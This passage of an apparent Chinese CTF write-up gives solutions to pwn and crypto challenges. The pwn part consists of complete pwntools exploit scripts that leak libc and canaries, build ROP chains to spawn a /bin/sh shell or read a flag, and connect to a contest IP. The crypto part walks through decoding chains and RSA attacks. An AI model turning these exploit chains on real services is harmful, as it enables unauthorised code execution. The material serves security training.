#### 5.task\_onecho ####

#coding:utf-8

import sys

from pwn import *

from ctypes import CDLL

context.log_level='debug'

elfelf='./onecho'

#context.arch='amd64'

while True :

# try :

elf=ELF(elfelf)

context.arch=elf.arch

gdb_text='''

telescope $rebase(0x202040) 16

'''

if len(sys.argv)==1 :

clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')

io=process(elfelf)

# io=process(['./'],env={'LD_PRELOAD':'./'})

clibc.srand(clibc.time(0))

libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')

# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')

one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]

else :

clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')

io=remote('182.116.62.85',24143)

clibc.srand(clibc.time(0))

libc=ELF('./libc.so.6')

# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')

one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]

pay='../flag'+'\x00'*0x105+p32(0x11111111)+p32(0x08049812)+p32(0x0804c800)+p32(0x100)

pay+=p32(0x08049812)+p32(0x0804c800)+p32(0x0804c800)

pay+=p32(0x08049180)+p32(0x8049224)+p32(0x804BFC8)

io.recv()

# gdb.attach(io,gdb_text)

io.sendline(pay)

libc_base=u32(io.recvuntil('\xf7')[-4:])-libc.sym['puts']

libc.address=libc_base

bin_sh_addr=libc.search('/bin/sh\x00').next()

system_addr=libc.sym['system']

free_hook_addr=libc.sym['__free_hook']

pay='\x00'*0x10c+p32(0x11111111)+p32(0x08049812)+p32(0x0804c800)+p32(0x10)

pay+=p32(libc.sym['open'])+p32(0x08049811)+p32(0x0804c801)+p32(0)+p32(0)

pay+=p32(0x08049130)+p32(0x08049811)+p32(3)+p32(0x0804c900)+p32(0x30)

pay+=p32(libc.sym['write'])+p32(0x08049811)+p32(1)+p32(0x0804c900)+p32(0x30)

io.recv()

# gdb.attach(io,gdb_text)

io.sendline(pay)

success('libc_base:'+hex(libc_base))

# success('heap_base:'+hex(heap_base))

# gdb.attach(io,gdb_text)

io.interactive()

# except Exception as e:

#     io.close()

#     continue

# else:

#     continue

或者

# -*- coding: utf-8 -*-

from pwn import *

#p=process('./1')

p=remote('182.116.62.85',27056)

elf=ELF('1')

libc=ELF('libc-2.27.so')

context(arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])

context.log_level='debug'

def debug():

gdb.attach(p)

pause()

def lg(name,val):

log.success(name+' : '+hex(val))

pop_rdi=0x0000000000400863

pop_rsi_r15=0x0000000000400861

ret=0x000000000040059e

p.recvuntil('Do you know how to do buffer overflow?')

p.send(0x49*'a')

p.recvuntil(0x49*'a')

canary=u64('\x00'+p.recv(7))

bp=u64(p.recv(6).ljust(8,'\x00'))

print hex(bp)

print hex(canary)

payload=0x48*'a'+p64(canary)+p64(bp)+p64(ret)+p64(ret)+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])

payload+=p64(0x4006E2)

p.recvuntil('Try harder!')

p.send(payload)

libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['read']

payload=0x48*'a'+p64(canary)+p64(bp-8)+p64(ret)+p64(pop_rdi)+p64(libc.search('/bin/sh').next())+p64(libc.sym['system'])

#debug()

p.send(payload)

p.recvuntil('Try harder!')

p.send(payload)

p.interactive()

#### 6.easycho ####

解题思路  
通过恶意更改canary触发smash打印出flag

# -*- coding: utf-8 -*-
    from pwn import *
    #p=process('./1')
    p=remote('182.116.62.85',24842)
    context(arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])
    #context.log_level='debug'
    def debug():
        gdb.attach(p)
        pause()
    def lg(name,val):
        log.success(name+' : '+hex(val))
    
        
    p.recvuntil('Name: ')
    p.sendline(16*'a')
    p.recvuntil(16*'a')
    base=u64(p.recv(6).ljust(8,'\x00'))-3312
    lg('base',base)
    p.recvuntil('Input: ')
    p.sendline(0x100*'b'+0x50*'a'+p64(0x111)+p64(0x1111)+p64(base+0x202040)+p64(base+0x202040))
    p.recvuntil('Input: ')
    p.sendline('backdoor')
    #debug()
    p.recvuntil('Input: ')
    p.sendline('exitexit')
    p.interactive()

### **Crypto** ###

原题：

http://www.3fwork.com/kaifa200/004475MYM012472/

#### 1.a\_crypto ####

ROT13编码，解码后得

![1fbc878d53320dd7c5bf311976b44898.jpeg][]

得到：

4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35

16进制串转字符串得

a = "4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35"
    for i in range(0,len(a),2):
        print(chr(eval('0x'+a[i]+a[i+1])),end="")
    #KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5

得到：

KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5

base32串解码得

V143Pytkc2lAYlV3SlRmVXQ9X0dVdmd6KEYpP3t4V29+MElXSER9TUEkPA==

base64解码得

W^7?+dsi@bUwJTfUt=\_GUvgz(F)?\{xWo~0IWHD\}MA$<

base85解码得

flag\{W0w\_y0u\_c4n\_rea11y\_enc0d1ng!\}

或者

利用ciphey工具

![9792f4f735bd84429a9ff9f2a1efdfb5.jpeg][]

#### 2.easy\_crypto ####

公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业平等民主公正诚信和谐公正文明公正爱国自由诚信自由平等文明公正诚信富强自由法治法治平等平等自由平等富强法治诚信和谐

下载完打开一看，这不是核心价值观编码，直接解一下

社会主义核心价值观加密，在线解http://www.atoolbox.net/Tool.php?Id=850

![b29f731ef2fb120972f4322075bef86f.jpeg][]

#### 3. babyrsa ####

原题

[http://www.zbc53.top/archives/148/][http_www.zbc53.top_archives_148]

题目：

from Crypto.Util.number import getPrime, bytes\_to\_long

from secret import flag

p = getPrime(1024)

q = getPrime(1024)

n = p \* q

e = 65537

hint1 = p >> 724\#p高位302

hint2 = q % (2 \*\* 265)

ct = pow(bytes\_to\_long(flag), e, n)

print(hint1)

print(hint2)

print(n)

print(ct)

hint1 = 1514296530850131082973956029074258536069144071110652176122006763622293335057110441067910479

hint2 = 40812438243894343296354573724131194431453023461572200856406939246297219541329623

n = 21815431662065695412834116602474344081782093119269423403335882867255834302242945742413692949886248581138784199165404321893594820375775454774521554409598568793217997859258282700084148322905405227238617443766062207618899209593375881728671746850745598576485323702483634599597393910908142659231071532803602701147251570567032402848145462183405098097523810358199597631612616833723150146418889589492395974359466777040500971885443881359700735149623177757865032984744576285054725506299888069904106805731600019058631951255795316571242969336763938805465676269140733371287244624066632153110685509892188900004952700111937292221969

ct = 19073695285772829730103928222962723784199491145730661021332365516942301513989932980896145664842527253998170902799883262567366661277268801440634319694884564820420852947935710798269700777126717746701065483129644585829522353341718916661536894041337878440111845645200627940640539279744348235772441988748977191513786620459922039153862250137904894008551515928486867493608757307981955335488977402307933930592035163126858060189156114410872337004784951228340994743202032248681976932591575016798640429231399974090325134545852080425047146251781339862753527319093938929691759486362536986249207187765947926921267520150073408188188

hint1就是p的高300位，hint2就是q的低位，想到高位攻击，可是高位攻击一般需要其中一个因子已知的570位，根据q的低位求出p的低位，再爆破点比特位就行了。

![9397e6146fce47951ba242c92986421b.jpeg][]

由此得到p的低位p0，结合高位攻击

exp：

\`\`\`python

from gmpy2 import \*

from Crypto.Util.number import \*

p1 = 1514296530850131082973956029074258536069144071110652176122006763622293335057110441067910479

q0 = 40812438243894343296354573724131194431453023461572200856406939246297219541329623

mod=pow(2,265)

p0=n\*invert(q0,mod)%mod

pbar=(p1<<724)+p0

\#sage

PR.<x> = PolynomialRing(Zmod(n))

for i in range(32):

f=pbar+x\*mod\*32

f=f.monic()

pp=f.small\_roots(X=2^454,beta=0.4)

if(pp):

break

pbar+=mod

p=pbar+pp\[0\]\*32\*mod

assert n%p==0

print(p)

q=n//p

phi=(p-1)\*(q-1)

e=65537

d=gmpy2.invert(e,phi)

c=19073695285772829730103928222962723784199491145730661021332365516942301513989932980896145664842527253998170902799883262567366661277268801440634319694884564820420852947935710798269700777126717746701065483129644585829522353341718916661536894041337878440111845645200627940640539279744348235772441988748977191513786620459922039153862250137904894008551515928486867493608757307981955335488977402307933930592035163126858060189156114410872337004784951228340994743202032248681976932591575016798640429231399974090325134545852080425047146251781339862753527319093938929691759486362536986249207187765947926921267520150073408188188

m=gmpy2.powmod(c,d,n)

print(long\_to\_bytes(m))

\#flag\{ef5e1582-8116-4f61-b458-f793dc03f2ff\}

#### 4.Crazy\_Rsa\_Tech ####

题目：

from Crypto.Util.number import \*

from Crypto.Util.Padding import \*

FLAG = bytes\_to\_long(pad(b"flag\{??????\}",64))

def init\_key():

p, q = getPrime(512), getPrime(512)

n = p\*q

e = 9

while(GCD((p-1)\*(q-1),e)!=1):

p, q = getPrime(512), getPrime(512)

n = p\*q

d = inverse(e,(p-1)\*(q-1))

return n,e,d

n\_list=list()

c\_list=list()

for i in range(9):

N,e,d=init\_key()

n\_list.append(N)

c=pow(FLAG,e,N)

c\_list.append(pow(FLAG,e,N))

assert(pow(c,d,N)==FLAG)

print("n\_list:",n\_list)

print("c\_list:",c\_list)

\#附件output.txt

n\_list = \[71189786319102608575263218254922479901008514616376166401353025325668690465852130559783959409002115897148828732231478529655075366072137059589917001875303598680931962384468363842379833044123189276199264340224973914079447846845897807085694711541719515881377391200011269924562049643835131619086349617062034608799, 92503831027754984321994282254005318198418454777812045042619263533423066848097985191386666241913483806726751133691867010696758828674382946375162423033994046273252417389169779506788545647848951018539441971140081528915876529645525880324658212147388232683347292192795975558548712504744297104487514691170935149949, 100993952830138414466948640139083231443558390127247779484027818354177479632421980458019929149817002579508423291678953554090956334137167905685261724759487245658147039684536216616744746196651390112540237050493468689520465897258378216693418610879245129435268327315158194612110422630337395790254881602124839071919, 59138293747457431012165762343997972673625934330232909935732464725128776212729547237438509546925172847581735769773563840639187946741161318153031173864953372796950422229629824699580131369991913883136821374596762214064774480548532035315344368010507644630655604478651898097886873485265848973185431559958627423847, 66827868958054485359731420968595906328820823695638132426084478524423658597714990545142120448668257273436546456116147999073797943388584861050133103137697812149742551913704341990467090049650721713913812069904136198912314243175309387952328961054617877059134151915723594900209641163321839502908705301293546584147, 120940513339890268554625391482989102665030083707530690312336379356969219966820079510946652021721814016286307318930536030308296265425674637215009052078834615196224917417698019787514831973471113022781129000531459800329018133248426080717653298100515701379374786486337920294380753805825328119757649844054966712377, 72186594495190221129349814154999705524005203343018940547856004977368023856950836974465616291478257156860734574686154136925776069045232149725101769594505766718123155028300703627531567850035682448632166309129911061492630709698934310123778699316856399909549674138453085885820110724923723830686564968967391721281, 69105037583161467265649176715175579387938714721653281201847973223975467813529036844308693237404592381480367515044829190066606146105800243199497182114398931410844901178842049915914390117503986044951461783780327749665912369177733246873697481544777183820939967036346862056795919812693669387731294595126647751951, 76194219445824867986050004226602973283400885106636660263597964027139613163638212828932901192009131346530898961165310615466747046710743013409318156266326090650584190382130795884514074647833949281109675170830565650006906028402714868781834693473191228256626654011772428115359653448111208831188721505467497494581\]

c\_list = \[62580922178008480377006528793506649089253164524883696044759651305970802215270721223149734532870729533611357047595181907404222690394917605617029675103788705320032707977225447998111744887898039756375876685711148857676502670812333076878964148863713993853526715855758799502735753454247721711366497722251078739585, 46186240819076690248235492196228128599822002268014359444368898414937734806009161030424589993541799877081745454934484263188270879142125136786221625234555265815513136730416539407710862948861531339065039071959576035606192732936477944770308784472646015244527805057990939765708793705044236665364664490419874206900, 85756449024868529058704599481168414715291172247059370174556127800630896693021701121075838517372920466708826412897794900729896389468152213884232173410022054605870785910461728567377769960823103334874807744107855490558726013068890632637193410610478514663078901021307258078678427928255699031215654693270240640198, 14388767329946097216670270960679686032536707277732968784379505904021622612991917314721678940833050736745004078559116326396233622519356703639737886289595860359630019239654690312132039876082685046329079266785042428947147658321799501605837784127004536996628492065409017175037161261039765340032473048737319069656, 1143736792108232890306863524988028098730927600066491485326214420279375304665896453544100447027809433141790331191324806205845009336228331138326163746853197990596700523328423791764843694671580875538251166864957646807184041817863314204516355683663859246677105132100377322669627893863885482167305919925159944839, 2978800921927631161807562509445310353414810029862911925227583943849942080514132963605492727604495513988707849133045851539412276254555228149742924149242124724864770049898278052042163392380895275970574317984638058768854065506927848951716677514095183559625442889028813635385408810698294574175092159389388091981, 16200944263352278316040095503540249310705602580329203494665614035841657418101517016718103326928336623132935178377208651067093136976383774189554806135146237406248538919915426183225265103769259990252162411307338473817114996409705345401251435268136647166395894099897737607312110866874944619080871831772376466376, 31551601425575677138046998360378916515711528548963089502535903329268089950335615563205720969393649713416910860593823506545030969355111753902391336139384464585775439245735448030993755229554555004154084649002801255396359097917380427525820249562148313977941413268787799534165652742114031759562268691233834820996, 25288164985739570635307839193110091356864302148147148153228604718807817833935053919412276187989509493755136905193728864674684139319708358686431424793278248263545370628718355096523088238513079652226028236137381367215156975121794485995030822902933639803569133458328681148758392333073624280222354763268512333515\]

九组密文c和模数n，e=9很小，低加密指数攻击

exp：

import gmpy2

import math

from Crypto.Util.number import \*

def merge(a1,n1,a2,n2):

d = math.gcd(n1,n2)

c = a2-a1

if c%d!=0:

return 0

c = (c%n2+n2)%n2

c = c//d

n1 = n1//d

n2 = n2//d

c \*= gmpy2.invert(n1,n2)

c %= n2

c \*= n1\*d

c += a1

global n3

global a3

n3 = n1\*n2\*d

a3 = (c%n3+n3)%n3

return 1

def exCRT(a,n):

a1=a\[0\]

n1=n\[0\]

le= len(a)

for i in range(1,le):

a2 = a\[i\]

n2=n\[i\]

if not merge(a1,n1,a2,n2):

return -1

a1 = a3

n1 = n3

global mod

mod=n1

return (a1%n1+n1)%n1

def exCRT\_getequation(a,n):

a1=a\[0\]

n1=n\[0\]

le= len(a)

for i in range(1,le):

a2 = a\[i\]

n2=n\[i\]

if not merge(a1,n1,a2,n2):

return -1

a1 = a3

n1 = n3

return (a1,n1)

n = \[71189786319102608575263218254922479901008514616376166401353025325668690465852130559783959409002115897148828732231478529655075366072137059589917001875303598680931962384468363842379833044123189276199264340224973914079447846845897807085694711541719515881377391200011269924562049643835131619086349617062034608799, 92503831027754984321994282254005318198418454777812045042619263533423066848097985191386666241913483806726751133691867010696758828674382946375162423033994046273252417389169779506788545647848951018539441971140081528915876529645525880324658212147388232683347292192795975558548712504744297104487514691170935149949, 100993952830138414466948640139083231443558390127247779484027818354177479632421980458019929149817002579508423291678953554090956334137167905685261724759487245658147039684536216616744746196651390112540237050493468689520465897258378216693418610879245129435268327315158194612110422630337395790254881602124839071919, 59138293747457431012165762343997972673625934330232909935732464725128776212729547237438509546925172847581735769773563840639187946741161318153031173864953372796950422229629824699580131369991913883136821374596762214064774480548532035315344368010507644630655604478651898097886873485265848973185431559958627423847, 66827868958054485359731420968595906328820823695638132426084478524423658597714990545142120448668257273436546456116147999073797943388584861050133103137697812149742551913704341990467090049650721713913812069904136198912314243175309387952328961054617877059134151915723594900209641163321839502908705301293546584147, 120940513339890268554625391482989102665030083707530690312336379356969219966820079510946652021721814016286307318930536030308296265425674637215009052078834615196224917417698019787514831973471113022781129000531459800329018133248426080717653298100515701379374786486337920294380753805825328119757649844054966712377, 72186594495190221129349814154999705524005203343018940547856004977368023856950836974465616291478257156860734574686154136925776069045232149725101769594505766718123155028300703627531567850035682448632166309129911061492630709698934310123778699316856399909549674138453085885820110724923723830686564968967391721281, 69105037583161467265649176715175579387938714721653281201847973223975467813529036844308693237404592381480367515044829190066606146105800243199497182114398931410844901178842049915914390117503986044951461783780327749665912369177733246873697481544777183820939967036346862056795919812693669387731294595126647751951, 76194219445824867986050004226602973283400885106636660263597964027139613163638212828932901192009131346530898961165310615466747046710743013409318156266326090650584190382130795884514074647833949281109675170830565650006906028402714868781834693473191228256626654011772428115359653448111208831188721505467497494581\]

c = \[62580922178008480377006528793506649089253164524883696044759651305970802215270721223149734532870729533611357047595181907404222690394917605617029675103788705320032707977225447998111744887898039756375876685711148857676502670812333076878964148863713993853526715855758799502735753454247721711366497722251078739585, 46186240819076690248235492196228128599822002268014359444368898414937734806009161030424589993541799877081745454934484263188270879142125136786221625234555265815513136730416539407710862948861531339065039071959576035606192732936477944770308784472646015244527805057990939765708793705044236665364664490419874206900, 85756449024868529058704599481168414715291172247059370174556127800630896693021701121075838517372920466708826412897794900729896389468152213884232173410022054605870785910461728567377769960823103334874807744107855490558726013068890632637193410610478514663078901021307258078678427928255699031215654693270240640198, 14388767329946097216670270960679686032536707277732968784379505904021622612991917314721678940833050736745004078559116326396233622519356703639737886289595860359630019239654690312132039876082685046329079266785042428947147658321799501605837784127004536996628492065409017175037161261039765340032473048737319069656, 1143736792108232890306863524988028098730927600066491485326214420279375304665896453544100447027809433141790331191324806205845009336228331138326163746853197990596700523328423791764843694671580875538251166864957646807184041817863314204516355683663859246677105132100377322669627893863885482167305919925159944839, 2978800921927631161807562509445310353414810029862911925227583943849942080514132963605492727604495513988707849133045851539412276254555228149742924149242124724864770049898278052042163392380895275970574317984638058768854065506927848951716677514095183559625442889028813635385408810698294574175092159389388091981, 16200944263352278316040095503540249310705602580329203494665614035841657418101517016718103326928336623132935178377208651067093136976383774189554806135146237406248538919915426183225265103769259990252162411307338473817114996409705345401251435268136647166395894099897737607312110866874944619080871831772376466376, 31551601425575677138046998360378916515711528548963089502535903329268089950335615563205720969393649713416910860593823506545030969355111753902391336139384464585775439245735448030993755229554555004154084649002801255396359097917380427525820249562148313977941413268787799534165652742114031759562268691233834820996, 25288164985739570635307839193110091356864302148147148153228604718807817833935053919412276187989509493755136905193728864674684139319708358686431424793278248263545370628718355096523088238513079652226028236137381367215156975121794485995030822902933639803569133458328681148758392333073624280222354763268512333515\]

m9=exCRT(c,n)

m=gmpy2.iroot(m9,9)\[0\]

print(long\_to\_bytes(m))

\#flag\{H0w\_Fun\_13\_HAstads\_broadca5t\_AtTack!\}

附上题目源码文件：

[https://pan.baidu.com/s/1HG5Q1cxFWWi4-gaoOPKGFw 提取码: 2ac6][https_pan.baidu.com_s_1HG5Q1cxFWWi4-gaoOPKGFw _ 2ac6]参考链接：

https://mp.weixin.qq.com/s/WGEjSSNDJuZcnqJJev5zGQ
          
          
           
          
          
           
           
           
            https://mp.weixin.qq.com/s/TZt0oUkmgJYe21SbcS5Ybw
          
          
           
          
          
           
            
           
           https://blog.csdn.net/qq_51724251/article/details/120658086

[https_www.xctf.org.cn_library_details_8ad0f5b6ac740ec0930e948a40f34a67b3d4f565]: https://www.xctf.org.cn/library/details/8ad0f5b6ac740ec0930e948a40f34a67b3d4f565/
[7fd82fe56cb6916490958ef754c56f52.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/1880440532c6427c9066ef641cfc9999.jpeg
[c6499659d42fc615fa1180ea5626d529.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/60633e64cf314f768858bfbfd9bb5954.jpeg
[87150a2ba6679eaee7dc96b0eecbcb2e.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/dcbef700ee27438c911d6e35b54c324d.jpeg
[5a7122215098c5b35c6fbc9a5e68f934.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/c2f346e2b44f42d684131ea5d129501b.jpeg
[9ef769099a8c11786098a4efca9cb288.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/8b76413984bf4ae09d445a4ff6e51c9a.jpeg
[3a1384a7c63edb174925025e1b68ff67.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/ae43d720adb44919b5f7e01318e87824.jpeg
[87e4870c492afc35098edca5bf8668a1.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/657ede7499d841e6865255b3f6e99722.jpeg
[53c5bc71b8aeb81da1cde59db2c84564.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/730895c5d2474fb29e8c4fb7fe64ba64.jpeg
[45c96c366f9f371962e60e0a5d42f6eb.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/1ec07922adc44b2b862b7b4c4c2ddbf6.jpeg
[525010afbe3ba8da31b5c4dbb1a146c1.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/30e61e0d39c940e0834c1cfcbbdef600.jpeg
[d34d1c0cd0690ed5c05df60cc9cb766e.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/513ce068e0c747ab929c9f5bd94a8ebd.jpeg
[6fa22a135343b49601de08960541bf63.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/d781f9f0d93b46bf942f7f8f84959c10.jpeg
[191f65d860bdef89a2836c0b5ec15cec.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/e414718b8c89442c86b277cd9eb4229b.jpeg
[f8a55fd906dee5a759571ed353d6bb63.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/21f55f947ff74b7ebf136787df983a07.jpeg
[96d21012f18b266264ff1dfd779d32a2.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/85390756b4bc49cf99f7031d24f64913.jpeg
[5479057e065d1a3c045f3db88ac2dfc6.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/07d2e8bb518442a3a09e831395530824.jpeg
[ee46043dc42cc5222aaa2c37c7a7a7b9.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/54dfa2077ba94611a2f1d67dbf82a61b.jpeg
[988660a199d9ac70a4d15bc17ec1d2a4.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/8c21c9ec610b4da88cb72037a00dcadf.jpeg
[c7a4f167df78d706bbae370b19b8598c.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/6830039b4dee4327b440decb3840c63d.jpeg
[713e65ab94316c2120502cc4485df826.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/ea9b90f35aca40749d05eb6d600476a6.jpeg
[f5d2e8974024707a9a532e9ebe4b9447.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/e00cec36d5fc42ae93daa53686af1d66.png
[17ae19215284d4c48943106aef497186.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/cb2044d3003b49c98bf44ce984027b8b.jpeg
[1fbc878d53320dd7c5bf311976b44898.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/c205c1da17d7493eb1e6b2b4f912c29b.jpeg
[9792f4f735bd84429a9ff9f2a1efdfb5.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/376f5af1b08344b29cd2b30ce40ff827.jpeg
[b29f731ef2fb120972f4322075bef86f.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/26725403c4744404bf3f7c22ecfcb39f.jpeg
[http_www.zbc53.top_archives_148]: http://www.zbc53.top/archives/148/
[9397e6146fce47951ba242c92986421b.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/0aee05958c554b9fb251c8773f1a3d9e.jpeg
[https_pan.baidu.com_s_1HG5Q1cxFWWi4-gaoOPKGFw _ 2ac6]: https://pan.baidu.com/s/1HG5Q1cxFWWi4-gaoOPKGFw%20%E6%8F%90%E5%8F%96%E7%A0%81:%202ac6%20